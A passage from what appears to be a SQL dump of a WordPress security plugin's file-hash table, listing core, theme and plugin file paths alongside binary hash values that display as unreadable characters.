�h,��t�>I','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ�΂���RJVY��p','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dղ�������5� ',':��s3]9��R�*�w��\n�+#f����ݕ','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U3�\"�ӳY&tP�,','�v��nݰFP/���q ��[yG\0�M��','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����/h�f\0W�','�ir���FT��n �Τ�~�NpE��Z�����z','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('g\n��[�q��g-	i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g))h�*�؂7��@','wp-content/themes/magazine-hoot/hybrid/hybrid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vz�G)E��=R��b',',�b��9�u5/Z\\k�\ZW�{q໰�o�2���','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g�QU�-�f�Ѥ\"�\'','wp-content/themes/magazine-hoot/include/admin/widget-content-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{]��Np�ө�$�.��','ɶ�Pf��rœ5�̾�C��t	�I�����','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pq�����EyJ�$��','�Y�֋Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��u�\n�xv6�','��Vk�\n&B����S2�w@��UG�ƺ����?�','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r	1�C\'�m��h$x(���','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	&�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�t#`w�;���%m��','wp-content/themes/magazine-hoot/include/admin/images/archive-block3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GivJ���� ��|x�','P��d�\r���מ��2uT�UJ�+M�6��k','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק�	��ߋ�ޙ���J�6�qm','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i+�z��-]#ߔ','wp-content/themes/magazine-hoot/include/admin/images/premium-lightbox.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dٚI�uƀH�ւ2�','�::VB@���o��\r��,� ��e�0Ԏ��h','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+޲`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�S�e�ۋ-/','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�H�a})Β��;��~s','�3�&d)��s\Z<7æa�v�y�7�v�~����','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�\Z���Vox��k�o�','wp-content/themes/magazine-hoot/hybrid/extend/customize/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SLt�V�Z���o�','ճ\n-N(�5XWp�t+�d��|q�DV-G�^\nh','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o����	�cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j-az.�%g�-#�|��','wp-content/themes/magazine-hoot/include/admin/images/premium-shortcodes.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b (�|Gɥ��#I','�U�\\BfNZ���/��nky�W�i�[��	4�','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('j7\0p���D�2��\"�','wp-content/themes/magazine-hoot/template-parts/footer-subfooter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n3�`�)�Q�9�+:�4','��J۰V�[#�ԧ�s�؋��8�);�U�۞WR','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jV������8f����','wp-content/themes/magazine-hoot/hybrid/inc/class-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �H�vp�ީ��]�#�','9׮���J���NT�+���\0��y+;ɏ ','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f�+�#k�','����z\Z��O��3΢����}*�i�u`�!','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� R��rP��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j�a$�	?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('kLƆ\Z���h��̆Mݵ','wp-content/themes/magazine-hoot/hybrid/inc/functions-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�9䀍��lڼJ*�','�?��{?�%c�����������;��\'E','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����D�G��','����+��*ە�ۦE�J�%\"���HID�-�','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('ks�������=�� �ԟ','wp-content/themes/magazine-hoot/include/admin/images/pageheader-stretch.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hVGx�Y��\'�����','� �1���\"^�\r�8�-����h�6O,Xw','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ��	#푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z�׋��%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�nu���G-t�\n�1�','��q��3#������Sr�c:׹w�L�','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('l��b�Ɍ�r^z�#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xݮ�<�N\0.�ܰ��x','#C����?�=�Z�\\N-ev�\Z��w�GU!J��\Z','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[•=�px	��LE�^�4|��~30yx\Z�&�','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m�吕�t�{�a�J','wp-content/themes/magazine-hoot/include/admin/images/premium-support.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\r��ĥ]*s��u��','���\0�~zf���l�Vr������i��Q���`','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=�޺��\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T	��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�m�2\Z�.P���','�pA�V��O����i2E�ck�F]Y$SQ�Sl','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('n�e�����;����<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���Yp;:���N�','uL;�ީݒ<�sby\r7J�V����5[*ZzK��','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n��o�����y���','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����_�\n\Zt','>��M�,��A���a���k��\0�m,�D��','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn����/���=�','�v�Q�m�����	�S-��#Qf��7�l3h}|','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('o&\rue�2\\n�����','wp-content/themes/magazine-hoot/widget/post-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b�3�ZuɁ?r.$:','`�FL��.֜�hF��\rG�\0ޟ�4y���','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	